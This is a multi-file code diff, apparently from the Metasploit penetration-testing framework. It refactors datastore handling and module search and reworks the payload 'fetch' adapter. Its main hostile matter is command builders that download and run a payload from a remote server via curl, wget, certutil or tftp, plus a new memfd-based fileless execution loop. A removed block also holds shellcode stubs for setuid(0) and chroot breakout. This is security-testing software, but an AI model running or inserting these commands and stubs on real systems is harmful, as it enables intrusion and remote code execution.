-      new_instance
-    end
-
-    # Search for a value within the current datastore, taking into consideration any registered aliases, fallbacks, etc.
-    # If a value is not present in the current datastore, the global parent store will be referenced instead
-    #
-    # @param [String] key The key to search for
-    # @return [DataStoreSearchResult]
-    def search_for(key)
-      k = find_key_case(key)
-      return search_result(:user_defined, @user_defined[k]) if @user_defined.key?(k)
-
-      # Preference globally set values over a module's option default
-      framework_datastore_search = search_framework_datastore(key)
-      return framework_datastore_search if framework_datastore_search.found? && !framework_datastore_search.default?
-
-      option = @options.fetch(k) { @options.find { |option_name, _option| option_name.casecmp?(k) }&.last }
-      if option
-        # If the key isn't present - check any additional fallbacks that have been registered with the option.
-        # i.e. handling the scenario of SMBUser not being explicitly set, but the option has registered a more
-        # generic 'Username' fallback
-        option.fallbacks.each do |fallback|
-          fallback_search = search_for(fallback)
-          if fallback_search.found?
-            return search_result(:option_fallback, fallback_search.value, fallback_key: fallback)
-          end
-        end
-      end
-
-      # Checking for imported default values, ignoring case again TODO: add Alias test for this
-      imported_default_match = @defaults.find { |default_key, _default_value| default_key.casecmp?(k) }
-      return search_result(:imported_default, imported_default_match.last) if imported_default_match
-      return search_result(:option_default, option.default) if option
-
-      search_framework_datastore(k)
-    end
-
-    protected
-
-    # Search the framework datastore
-    #
-    # @param [String] key The key to search for
-    # @return [DataStoreSearchResult]
-    def search_framework_datastore(key)
-      return search_result(:not_found, nil) if @_module&.framework.nil?
-
-      @_module.framework.datastore.search_for(key)
-    end
-
-    def search_result(result, value, fallback_key: nil)
-      DataStoreSearchResult.new(result, value, namespace: :module_data_store, fallback_key: fallback_key)
-    end
-  end
-end
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary

  def run_batch(ips)
    datastore.delete('RHOSTS')
-    datastore.remove_option('RHOSTS') if self.datastore.is_a?(Msf::DataStoreWithFallbacks)
+    datastore.remove_option('RHOSTS') if self.datastore.is_a?(Msf::DataStore)
    datastore['rhosts'] = ips

    execute_module(<%= meta[:path] %>)
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Auxiliary
  def run_host(ip)
    print_status("Running for #{ip}...")
    rhost = datastore.delete('RHOST')
-    datastore.remove_option('RHOST') if self.datastore.is_a?(Msf::DataStoreWithFallbacks)
+    datastore.remove_option('RHOST') if self.datastore.is_a?(Msf::DataStore)
    datastore['rhost'] = rhost
    datastore['userpass'] ||= build_credentials_array
    datastore['sleep_interval'] ||= userpass_interval
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary
  def run_host(ip)
    print_status("Running for #{ip}...")
    rhost = datastore.delete('RHOST')
-    datastore.remove_option('RHOST') if self.datastore.is_a?(Msf::DataStoreWithFallbacks)
+    datastore.remove_option('RHOST') if self.datastore.is_a?(Msf::DataStore)
    datastore['rhost'] = rhost
    execute_module(<%= meta[:path] %>)
  end
@@ -25,6 +25,7 @@ module Msf::Modules::Metadata::Search
      mod_time
      name
      os
+      osvdb
      path
      platform
      port
@@ -113,8 +114,11 @@ module Msf::Modules::Metadata::Search
    raise ArgumentError if params.any? && VALID_PARAMS.none? { |k| params.key?(k) }
    search_results = []

+    regex_cache = Hash.new do |hash, search_term|
+      hash[search_term] = as_regex(search_term)
+    end
    get_metadata.each { |module_metadata|
-      if is_match(params, module_metadata)
+      if is_match(params, module_metadata, regex_cache)
        unless fields.empty?
          module_metadata = get_fields(module_metadata, fields)
        end
@@ -128,7 +132,7 @@ module Msf::Modules::Metadata::Search
  private
  #######

-  def is_match(params, module_metadata)
+  def is_match(params, module_metadata, regex_cache)
    return true if params.empty?

    param_hash = params
@@ -149,7 +153,7 @@ module Msf::Modules::Metadata::Search
          end

          param_hash[keyword][mode].each do |search_term|
-            has_match = text_segments.any? { |text_segment| text_segment =~ as_regex(search_term) }
+            has_match = text_segments.any? { |text_segment| text_segment =~ regex_cache[search_term] }
            match = [keyword, search_term] if has_match
            if mode == SearchMode::INCLUDE && !has_match
              return false
@@ -168,7 +172,7 @@ module Msf::Modules::Metadata::Search
          # Reset the match flag for each keyword for inclusive search
          match = false if mode == SearchMode::INCLUDE

-          regex = as_regex(search_term)
+          regex = regex_cache[search_term]
          case keyword
            when 'action'
              match = [keyword, search_term] if (module_metadata&.actions || []).any? { |action| action.any? { |k, v| k =~ regex || v =~ regex } }
@@ -180,6 +184,8 @@ module Msf::Modules::Metadata::Search
              match = [keyword, search_term] if module_metadata.arch =~ regex
            when 'cve'
              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref =~ /^cve\-/i and ref =~ regex }
+            when 'osvdb'
+              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref =~ /^osvdb\-/i and ref =~ regex }
            when 'bid'
              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref =~ /^bid\-/i and ref =~ regex }
            when 'edb'
@@ -291,6 +297,7 @@ module Msf::Modules::Metadata::Search
    aliases = {
        :cve => 'references',
        :edb => 'references',
+        :osvdb => 'references',
        :bid => 'references',
        :os => 'platform',
        :port => 'rport',
@@ -36,7 +36,7 @@ module Msf
    # Validates that any registered and required options are set
    #
    # @param options [Array<Msf::OptBase>] A modules registered options
-    # @param datastore [Msf::DataStore|Msf::DataStoreWithFallbacks] A modules datastore
+    # @param datastore [Msf::DataStore|Msf::DataStore] A modules datastore
    def validate(options, datastore)
      issues = {}
      required_options.each do |option_name|
@@ -475,7 +475,7 @@ class Payload < Msf::Module
    lhost = mod.datastore['LHOST'] || Rex::Socket.source_address(mod.datastore['RHOST'] || '50.50.50.50')

    configure_payload = lambda do |payload|
-      if mod.datastore.is_a?(Msf::DataStoreWithFallbacks)
+      if mod.datastore.is_a?(Msf::DataStore)
        payload_defaults = { 'PAYLOAD' => payload }

        # Set LHOST if this is a reverse payload
@@ -1,16 +1,13 @@
 module Msf::Payload::Adapter::Fetch
-
  def initialize(*args)
    super
    register_options(
      [
        Msf::OptBool.new('FETCH_DELETE', [true, 'Attempt to delete the binary after execution', false]),
-        Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: /^[^\s\/\\]*$/),
        Msf::OptPort.new('FETCH_SRVPORT', [true, 'Local port to use for serving payload', 8080]),
        # FETCH_SRVHOST defaults to LHOST, but if the payload doesn't connect back to Metasploit (e.g. adduser, messagebox, etc.) then FETCH_SRVHOST needs to be set
        Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ !options['LHOST']&.required, 'Local IP to use for serving payload']),
        Msf::OptString.new('FETCH_URIPATH', [ false, 'Local URI to use for serving payload', '']),
-        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', ''], regex:/^[\S]*$/)
      ]
    )
    register_advanced_options(
@@ -143,15 +140,24 @@ module Msf::Payload::Adapter::Fetch

  def srvuri
    return datastore['FETCH_URIPATH'] unless datastore['FETCH_URIPATH'].blank?
+
    default_srvuri
  end

  def windows?
    return @windows unless @windows.nil?
+
    @windows = platform.platforms.first == Msf::Module::Platform::Windows
    @windows
  end

+  def linux?
+    return @linux unless @linux.nil?
+
+    @linux = platform.platforms.first == Msf::Module::Platform::Linux
+    @linux
+  end
+
  def _check_tftp_port
    # Most tftp clients do not have configurable ports
    if datastore['FETCH_SRVPORT'] != 69 && datastore['FetchListenerBindPort'].blank?
@@ -177,32 +183,36 @@ module Msf::Payload::Adapter::Fetch
      comm = ::Rex::Socket::Comm::Local
    when /\A-?[0-9]+\Z/
      comm = framework.sessions.get(srv_comm.to_i)
-      raise(RuntimeError, "Socket Server Comm (Session #{srv_comm}) does not exist") unless comm
-      raise(RuntimeError, "Socket Server Comm (Session #{srv_comm}) does not implement Rex::Socket::Comm") unless comm.is_a? ::Rex::Socket::Comm
+      raise("Socket Server Comm (Session #{srv_comm}) does not exist") unless comm
+      raise("Socket Server Comm (Session #{srv_comm}) does not implement Rex::Socket::Comm") unless comm.is_a? ::Rex::Socket::Comm
    when nil, ''
      unless ip.nil?
        comm = Rex::Socket::SwitchBoard.best_comm(ip)
      end
    else
-      raise(RuntimeError, "SocketServer Comm '#{srv_comm}' is invalid")
+      raise("SocketServer Comm '#{srv_comm}' is invalid")
    end

    comm || ::Rex::Socket::Comm::Local
  end

-  def _execute_add
-    return _execute_win if windows?
-    return _execute_nix
+  def _execute_add(get_file_cmd)
+    return _execute_win(get_file_cmd) if windows?
+
+    return _execute_nix(get_file_cmd)
  end

-  def _execute_win
+  def _execute_win(get_file_cmd)
    cmds = " & start /B #{_remote_destination_win}"
    cmds << " & del #{_remote_destination_win}" if datastore['FETCH_DELETE']
-    cmds
+    get_file_cmd << cmds
  end

-  def _execute_nix
-    cmds = ";chmod +x #{_remote_destination_nix}"
+  def _execute_nix(get_file_cmd)
+    return _generate_fileless(get_file_cmd) if datastore['FETCH_FILELESS']
+
+    cmds = get_file_cmd
+    cmds << ";chmod +x #{_remote_destination_nix}"
    cmds << ";#{_remote_destination_nix}&"
    cmds << "sleep #{rand(3..7)};rm -rf #{_remote_destination_nix}" if datastore['FETCH_DELETE']
    cmds
@@ -211,43 +221,70 @@ module Msf::Payload::Adapter::Fetch
  def _generate_certutil_command
    case fetch_protocol
    when 'HTTP'
-      cmd = "certutil -urlcache -f http://#{download_uri} #{_remote_destination}"
+      get_file_cmd = "certutil -urlcache -f http://#{download_uri} #{_remote_destination}"
    when 'HTTPS'
      # I don't think there is a way to disable cert check in certutil....
      print_error('CERTUTIL binary does not support insecure mode')
      fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using CERTUTIL')
-      cmd = "certutil -urlcache -f https://#{download_uri} #{_remote_destination}"
+      get_file_cmd = "certutil -urlcache -f https://#{download_uri} #{_remote_destination}"
    else
      fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
    end
-    cmd + _execute_add
+    _execute_add(get_file_cmd)
+  end
+
+  # The idea behind fileless execution are anonymous files. The bash script will search through all processes owned by $USER and search from all file descriptor. If it will find anonymous file (contains "memfd") with correct permissions (rwx), it will copy the payload into that descriptor with defined fetch command and finally call that descriptor
+  def _generate_fileless(get_file_cmd)
+    # get list of all $USER's processes
+    cmd = 'FOUND=0'
+    cmd << ";for i in $(ps -u $USER | awk '{print $1}')"
+    # already found anonymous file where we can write
+    cmd << '; do if [ $FOUND -eq 0 ]'
+
+    # look for every symbolic link with write rwx permissions
+    # if found one, try to download payload into the anonymous file
+    # and execute it
+    cmd << '; then for f in $(find /proc/$i/fd -type l -perm u=rwx 2>/dev/null)'
+    cmd << '; do if [ $(ls -al $f | grep -o "memfd" >/dev/null; echo $?) -eq "0" ]'
+    cmd << "; then if $(#{get_file_cmd} >/dev/null)"
+    cmd << '; then $f'
+    cmd << '; FOUND=1'
+    cmd << '; break'
+    cmd << '; fi'
+    cmd << '; fi'
+    cmd << '; done'
+    cmd << '; fi'
+    cmd << '; done'
+
+    cmd
  end

  def _generate_curl_command
    case fetch_protocol
    when 'HTTP'
-      cmd = "curl -so #{_remote_destination} http://#{download_uri}"
+      get_file_cmd = "curl -so #{_remote_destination} http://#{download_uri}"
    when 'HTTPS'
-      cmd = "curl -sko #{_remote_destination} https://#{download_uri}"
+      get_file_cmd = "curl -sko #{_remote_destination} https://#{download_uri}"
    when 'TFTP'
-      cmd = "curl -so #{_remote_destination} tftp://#{download_uri}"
+      get_file_cmd = "curl -so #{_remote_destination} tftp://#{download_uri}"
    else
      fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
    end
-    cmd + _execute_add
+    _execute_add(get_file_cmd)
  end

  def _generate_ftp_command
    case fetch_protocol
    when 'FTP'
-      cmd = "ftp -Vo #{_remote_destination_nix} ftp://#{download_uri}#{_execute_nix}"
+      get_file_cmd = "ftp -Vo #{_remote_destination_nix} ftp://#{download_uri}"
    when 'HTTP'
-      cmd = "ftp -Vo #{_remote_destination_nix} http://#{download_uri}#{_execute_nix}"
+      get_file_cmd = "ftp -Vo #{_remote_destination_nix} http://#{download_uri}"
    when 'HTTPS'
-      cmd = "ftp -Vo #{_remote_destination_nix} https://#{download_uri}#{_execute_nix}"
+      get_file_cmd = "ftp -Vo #{_remote_destination_nix} https://#{download_uri}"
    else
      fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
    end
+    _execute_add(get_file_cmd)
  end

  def _generate_tftp_command
@@ -255,49 +292,61 @@ module Msf::Payload::Adapter::Fetch
    case fetch_protocol
    when 'TFTP'
      if windows?
-        cmd = "tftp -i #{srvhost} GET #{srvuri} #{_remote_destination} #{_execute_win}"
+        fetch_command = _execute_win("tftp -i #{srvhost} GET #{srvuri} #{_remote_destination}")
      else
        _check_tftp_file
-        cmd = "(echo binary ; echo get #{srvuri} ) | tftp #{srvhost}; chmod +x ./#{srvuri}; ./#{srvuri} &"
+        if datastore['FETCH_FILELESS'] && linux?
+          return _generate_fileless("(echo binary ; echo get #{srvuri} $f ) | tftp #{srvhost}")
+        else
+          fetch_command = "(echo binary ; echo get #{srvuri} ) | tftp #{srvhost}; chmod +x ./#{srvuri}; ./#{srvuri} &"
+        end
      end
    else
      fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
    end
-    cmd
+    fetch_command
  end

  def _generate_tnftp_command
    case fetch_protocol
    when 'FTP'
-      cmd = "tnftp -Vo #{_remote_destination_nix} ftp://#{download_uri}#{_execute_nix}"
+      get_file_cmd = "tnftp -Vo #{_remote_destination_nix} ftp://#{download_uri}"
    when 'HTTP'
-      cmd = "tnftp -Vo #{_remote_destination_nix} http://#{download_uri}#{_execute_nix}"
+      get_file_cmd = "tnftp -Vo #{_remote_destination_nix} http://#{download_uri}"
    when 'HTTPS'
-      cmd = "tnftp -Vo #{_remote_destination_nix} https://#{download_uri}#{_execute_nix}"
+      get_file_cmd = "tnftp -Vo #{_remote_destination_nix} https://#{download_uri}"
    else
      fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
    end
+    _execute_add(get_file_cmd)
  end

  def _generate_wget_command
    case fetch_protocol
    when 'HTTPS'
-      cmd = "wget -qO #{_remote_destination} --no-check-certificate https://#{download_uri}"
+      get_file_cmd = "wget -qO #{_remote_destination} --no-check-certificate https://#{download_uri}"
    when 'HTTP'
-      cmd = "wget -qO #{_remote_destination} http://#{download_uri}"
+      get_file_cmd = "wget -qO #{_remote_destination} http://#{download_uri}"
    else
      fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
    end
-    cmd + _execute_add
+
+    _execute_add(get_file_cmd)
  end

  def _remote_destination
    return _remote_destination_win if windows?
+
    return _remote_destination_nix
  end

  def _remote_destination_nix
    return @remote_destination_nix unless @remote_destination_nix.nil?
+
+    if datastore['FETCH_FILELESS']
+      @remote_destination_nix = '$f'
+      return @remote_destination_nix
+    end
    writable_dir = datastore['FETCH_WRITABLE_DIR']
    writable_dir = '.' if writable_dir.blank?
    writable_dir += '/' unless writable_dir[-1] == '/'
@@ -310,12 +359,13 @@ module Msf::Payload::Adapter::Fetch

  def _remote_destination_win
    return @remote_destination_win unless @remote_destination_win.nil?
+
    writable_dir = datastore['FETCH_WRITABLE_DIR']
    writable_dir += '\\' unless writable_dir.blank? || writable_dir[-1] == '\\'
    payload_filename = datastore['FETCH_FILENAME']
    payload_filename = srvuri if payload_filename.blank?
    payload_path = writable_dir + payload_filename
-    payload_path = payload_path + '.exe' unless payload_path[-4..-1] == '.exe'
+    payload_path += '.exe' unless payload_path[-4..] == '.exe'
    @remote_destination_win = payload_path
    @remote_destination_win
  end
@@ -1,13 +1,13 @@
 module Msf::Payload::Adapter::Fetch::LinuxOptions
-
  def initialize(info = {})
-    super(update_info(info,
-                      'DefaultOptions' => { 'FETCH_WRITABLE_DIR' => '/tmp' }
-          ))
+    super
    register_options(
      [
-        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w{ CURL FTP TFTP TNFTP WGET }])
+        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP TFTP TNFTP WGET]]),
+        Msf::OptBool.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk, Linux ≥3.17 only', false]),
+        Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'false']),
+        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', '/tmp'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'false'])
      ]
    )
  end
-end
+end
@@ -2,10 +2,10 @@ module Msf::Payload::Adapter::Fetch::WindowsOptions

  def initialize(info = {})
    super
-    deregister_options('FETCH_WRITABLE_DIR')
    register_options(
      [
        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w{ CURL TFTP CERTUTIL }]),
+        Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}),
        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces.', '%TEMP%'], regex:/^[\S]*$/)
      ]
    )
@@ -8,454 +8,13 @@
 #
 ###
 module Msf::Payload::Linux
-
  #
  # This mixin is chained within payloads that target the Linux platform.
  # It provides special prepends, to support things like chroot and setuid.
  #
+
  def initialize(info = {})
-    ret = super(info)
-
-    register_advanced_options(
-      [
-        Msf::OptBool.new('PrependFork',
-          [
-            false,
-            "Prepend a stub that starts the payload in its own process via fork",
-            "false"
-          ]
-        ),
-        Msf::OptBool.new('PrependSetresuid',
-          [
-            false,
-            "Prepend a stub that executes the setresuid(0, 0, 0) system call",
-            "false"
-          ]
-        ),
-        Msf::OptBool.new('PrependSetreuid',
-          [
-            false,
-            "Prepend a stub that executes the setreuid(0, 0) system call",
-            "false"
-          ]
-        ),
-        Msf::OptBool.new('PrependSetuid',
-          [
-            false,
-            "Prepend a stub that executes the setuid(0) system call",
-            "false"
-          ]
-        ),
-        Msf::OptBool.new('PrependSetresgid',
-          [
-            false,
-            "Prepend a stub that executes the setresgid(0, 0, 0) system call",
-            "false"
-          ]
-        ),
-        Msf::OptBool.new('PrependSetregid',
-          [
-            false,
-            "Prepend a stub that executes the setregid(0, 0) system call",
-            "false"
-          ]
-        ),
-        Msf::OptBool.new('PrependSetgid',
-          [
-            false,
-            "Prepend a stub that executes the setgid(0) system call",
-            "false"
-          ]
-        ),
-        Msf::OptBool.new('PrependChrootBreak',
-          [
-            false,
-            "Prepend a stub that will break out of a chroot (includes setreuid to root)",
-            "false"
-          ]
-        ),
-        Msf::OptBool.new('AppendExit',
-          [
-            false,
-            "Append a stub that executes the exit(0) system call",
-            "false"
-          ]
-        ),
-      ], Msf::Payload::Linux)
-
-    ret
+    super(info)
  end

-  def apply_prepends(buf)
-    pre = ''
-    app = ''
-
-    test_arch = [ *(self.arch) ]
-
-    # Handle all x86 code here
-    if (test_arch.include?(ARCH_X86))
-
-      # Prepend
-
-      if (datastore['PrependFork'])
-        pre << "\x6a\x02"             + #   pushb   $0x2                       #
-               "\x58"                 + #   popl    %eax                       #
-               "\xcd\x80"             + #   int     $0x80       ; fork         #
-               "\x85\xc0"             + #   test    %eax,%eax                  #
-               "\x74\x06"             + #   jz      loc_000f                   #
-                                        # loc_0009:
-               "\x31\xc0"             + #   xor     %eax,%eax                  #
-               "\xb0\x01"             + #   movb    $0x1,%al                   #
-               "\xcd\x80"             + #   int     $0x80       ; exit         #
-                                        # loc_000f:
-               "\xb0\x42"             + #   movb    %0x42,%al                  #
-               "\xcd\x80"             + #   int     $0x80       ; setsid       #
-
-               "\x6a\x02"             + #   pushb   $0x2                       #
-               "\x58"                 + #   popl    %eax                       #
-               "\xcd\x80"             + #   int     $0x80       ; fork         #
-               "\x85\xc0"             + #   test    %eax,%eax                  #
-               "\x75\xed"               #   jnz     loc_0009                   #
-      end
-
-      if (datastore['PrependSetresuid'])
-        # setresuid(0, 0, 0)
-        pre << "\x31\xc9"             + #   xorl    %ecx,%ecx                  #
-               "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
-               "\xf7\xe3"             + #   mull    %ebx                       #
-               "\xb0\xa4"             + #   movb    $0xa4,%al                  #
-               "\xcd\x80"               #   int     $0x80                      #
-      end
-
-      if (datastore['PrependSetreuid'])
-        # setreuid(0, 0)
-        pre << "\x31\xc9"             + #   xorl    %ecx,%ecx                  #
-               "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
-               "\x6a\x46"             + #   pushl   $0x46                      #
-               "\x58"                 + #   popl    %eax                       #
-               "\xcd\x80"               #   int     $0x80                      #
-      end
-
-      if (datastore['PrependSetuid'])
-        # setuid(0)
-        pre << "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
-               "\x6a\x17"             + #   pushl   $0x17                      #
-               "\x58"                 + #   popl    %eax                       #
-               "\xcd\x80"               #   int     $0x80                      #
-      end
-
-      if (datastore['PrependSetresgid'])
-        # setresgid(0, 0, 0)
-        pre << "\x31\xc9"             + #   xorl    %ecx,%ecx                  #
-               "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
-               "\xf7\xe3"             + #   mull    %ebx                       #
-               "\xb0\xaa"             + #   movb    $0xaa,%al                  #
-               "\xcd\x80"               #   int     $0x80                      #
-      end
-
-      if (datastore['PrependSetregid'])
-        # setregid(0, 0)
-        pre << "\x31\xc9"             + #   xorl    %ecx,%ecx                  #
-               "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
-               "\x6a\x47"             + #   pushl   $0x47                      #
-               "\x58"                 + #   popl    %eax                       #
-               "\xcd\x80"               #   int     $0x80                      #
-      end
-
-      if (datastore['PrependSetgid'])
-        # setgid(0)
-        pre << "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
-               "\x6a\x2e"             + #   pushl   $0x2e                      #
-               "\x58"                 + #   popl    %eax                       #
-               "\xcd\x80"               #   int     $0x80                      #
-      end
-
-      if (datastore['PrependChrootBreak'])
-        # setreuid(0, 0)
-        pre << "\x31\xc9"             + #   xorl    %ecx,%ecx                  #
-               "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
-               "\x6a\x46"             + #   pushl   $0x46                      #
-               "\x58"                 + #   popl    %eax                       #
-               "\xcd\x80"               #   int     $0x80                      #
-
-        # break chroot
-        pre << "\x6a\x3d"             + #   pushl  $0x3d                       #
-             # build dir str (ptr in ebx)
-             "\x89\xe3"             + #   movl   %esp,%ebx                   #
-             # mkdir(dir)
-             "\x6a\x27"             + #   pushl  $0x27                       #
-             "\x58"                 + #   popl   %eax                        #
-             "\xcd\x80"             + #   int     $0x80                      #
-             # chroot(dir)
-             "\x89\xd9"             + #   movl   %ebx,%ecx                   #
-             "\x58"                 + #   popl   %eax                        #
-             "\xcd\x80"             + #   int     $0x80                      #
-             # build ".." str (ptr in ebx)
-             "\x31\xc0"             + #   xorl   %eax,%eax                   #
-             "\x50"                 + #   pushl  %eax                        #
-
-             "\x66\x68\x2e\x2e"     + #   pushw  $0x2e2e                     #
-             "\x89\xe3"             + #   movl   %esp,%ebx                   #
-             # loop changing dir
-             "\x6a\x3d"             + #   pushl  $0x1e                       #
-             "\x59"                 + #   popl   %ecx                        #
-             "\xb0\x0c"             + #   movb   $0xc,%al                    #
-             "\xcd\x80"             + #   int     $0x80                      #
-             "\xe2\xfa"             + #   loop   -6                          #
-             # final chroot
-             "\x6a\x3d"             + #   pushl  $0x3d                       #
-             "\x89\xd9"             + #   movl   %ebx,%ecx                   #
-             "\x58"                 + #   popl   %eax                        #
-             "\xcd\x80"               #   int     $0x80                      #
-      end
-
-      # Append exit(0)
-
-      if (datastore['AppendExit'])
-        app << "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
-          "\x6a\x01"             + #   pushl   $0x01                      #
-          "\x58"                 + #   popl    %eax                       #
-          "\xcd\x80"              #   int     $0x80                      #
-      end
-
-    # Handle all Power/CBEA code here
-    elsif (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
-
-      # Prepend
-
-      if (datastore['PrependSetresuid'])
-        # setresuid(0, 0, 0)
-        pre << "\x3b\xe0\x01\xff"     + #   li      r31,511                    #
-               "\x7c\xa5\x2a\x78"     + #   xor     r5,r5,r5                   #
-               "\x7c\x84\x22\x78"     + #   xor     r4,r4,r4                   #
-               "\x7c\x63\x1a\x78"     + #   xor     r3,r3,r3                   #
-               "\x38\x1f\xfe\xa5"     + #   addi    r0,r31,-347                #
-               "\x44\xff\xff\x02"       #   sc                                 #
-      end
-
-      if (datastore['PrependSetreuid'])
-        # setreuid(0, 0)
-        pre << "\x3b\xe0\x01\xff"     + #   li      r31,511                    #
-               "\x7c\x84\x22\x78"     + #   xor     r4,r4,r4                   #
-               "\x7c\x63\x1a\x78"     + #   xor     r3,r3,r3                   #
-               "\x38\x1f\xfe\x47"     + #   addi    r0,r31,-441                #
-               "\x44\xff\xff\x02"       #   sc                                 #
-      end
-
-      if (datastore['PrependSetuid'])
-        # setuid(0)
-        pre << "\x3b\xe0\x01\xff"     + #   li      r31,511                    #
-               "\x7c\x63\x1a\x78"     + #   xor     r3,r3,r3                   #
-               "\x38\x1f\xfe\x18"     + #   addi    r0,r31,-488                #
-               "\x44\xff\xff\x02"       #   sc                                 #
-      end
-
-      if (datastore['PrependSetresgid'])
-        # setresgid(0, 0, 0)
-        pre << "\x3b\xe0\x01\xff"     + #   li      r31,511                    #
-               "\x7c\xa5\x2a\x78"     + #   xor     r5,r5,r5                   #
-               "\x7c\x84\x22\x78"     + #   xor     r4,r4,r4                   #
-               "\x7c\x63\x1a\x78"     + #   xor     r3,r3,r3                   #
-               "\x38\x1f\xfe\xab"     + #   addi    r0,r31,-341                #
-               "\x44\xff\xff\x02"       #   sc                                 #
-      end
-
-      if (datastore['PrependSetregid'])
-        # setregid(0, 0)
-        pre << "\x3b\xe0\x01\xff"     + #   li      r31,511                    #
-               "\x7c\x84\x22\x78"     + #   xor     r4,r4,r4                   #
-               "\x7c\x63\x1a\x78"     + #   xor     r3,r3,r3                   #
-               "\x38\x1f\xfe\x48"     + #   addi    r0,r31,-440                #
-               "\x44\xff\xff\x02"       #   sc                                 #
-      end
-
-      if (datastore['PrependSetgid'])
-        # setgid(0)
-        pre << "\x3b\xe0\x01\xff"     + #   li      r31,511                    #
-               "\x7c\x63\x1a\x78"     + #   xor     r3,r3,r3                   #
-               "\x38\x1f\xfe\x2f"     + #   addi    r0,r31,-465                #
-               "\x44\xff\xff\x02"       #   sc                                 #
-      end
-
-      if (datastore['PrependChrootBreak'])
-        # setreuid(0, 0)
-        pre << "\x3b\xe0\x01\xff"     + #   li      r31,511                    #
-               "\x7c\x84\x22\x78"     + #   xor     r4,r4,r4                   #
-               "\x7c\x63\x1a\x78"     + #   xor     r3,r3,r3                   #
-               "\x38\x1f\xfe\x47"     + #   addi    r0,r31,-441                #
-               "\x44\xff\xff\x02"       #   sc                                 #
-
-        # EEK! unsupported...
-      end
-
-      # Append exit(0)
-
-      if (datastore['AppendExit'])
-        app << "\x3b\xe0\x01\xff"     + #   li      r31,511                    #
-               "\x7c\x63\x1a\x78"     + #   xor     r3,r3,r3                   #
-               "\x38\x1f\xfe\x02"     + #   addi    r0,r31,-510                #
-               "\x44\xff\xff\x02"       #   sc                                 #
-      end
-
-    elsif (test_arch.include?(ARCH_X64))
-
-      if (datastore['PrependFork'])
-        # if (fork()) { exit(0); }; setsid(); if (fork()) { exit(0); };
-        pre << "\x6a\x39"             #    push    57        ; __NR_fork     #
-        pre << "\x58"                 #    pop     rax                       #
-        pre << "\x0f\x05"             #    syscall                           #
-        pre << "\x48\x85\xc0"         #    test    rax,rax                   #
-        pre << "\x74\x08"             #    jz      loc_0012                  #
-        #                             #  loc_000a:                           #
-        pre << "\x48\x31\xff"         #    xor     rdi,rdi                   #
-        pre << "\x6a\x3c"             #    push    60        ; __NR_exit     #
-        pre << "\x58"                 #    pop     rax                       #
-        pre << "\x0f\x05"             #    syscall                           #
-        #                             #  loc_0012:                           #
-        pre << "\x04\x70"             #    add     al, 112   ; __NR_setsid   #
-        pre << "\x0f\x05"             #    syscall                           #
-        pre << "\x6a\x39"             #    push    57        ; __NR_fork     #
-        pre << "\x58"                 #    pop     rax                       #
-        pre << "\x0f\x05"             #    syscall                           #
-        pre << "\x48\x85\xc0"         #    test    rax,rax                   #
-        pre << "\x75\xea"             #    jnz     loc_000a                  #
-      end
-
-      if (datastore['PrependSetresuid'])
-        # setresuid(0, 0, 0)
-        pre << "\x48\x31\xff"         #    xor     rdi,rdi                   #
-        pre << "\x48\x89\xfe"         #    mov     rsi,rdi                   #
-        pre << "\x6a\x75"             #    push    0x75                      #
-        pre << "\x58"                 #    pop     rax                       #
-        pre << "\x0f\x05"             #    syscall                           #
-      end
-
-      if (datastore['PrependSetreuid'])
-        # setreuid(0, 0)
-        pre << "\x48\x31\xff"         #    xor     rdi,rdi                   #
-        pre << "\x48\x89\xfe"         #    mov     rsi,rdi                   #
-        pre << "\x48\x89\xf2"         #    mov     rdx,rsi                   #
-        pre << "\x6a\x71"             #    push    0x71                      #
-        pre << "\x58"                 #    pop     rax                       #
-        pre << "\x0f\x05"             #    syscall                           #
-      end
-
-      if (datastore['PrependSetuid'])
-        # setuid(0)
-        pre << "\x48\x31\xff"         #    xor     rdi,rdi                   #
-        pre << "\x6a\x69"             #    push    0x69                      #
-        pre << "\x58"                 #    pop     rax                       #
-        pre << "\x0f\x05"             #    syscall                           #
-      end
-
-      if (datastore['PrependSetresgid'])
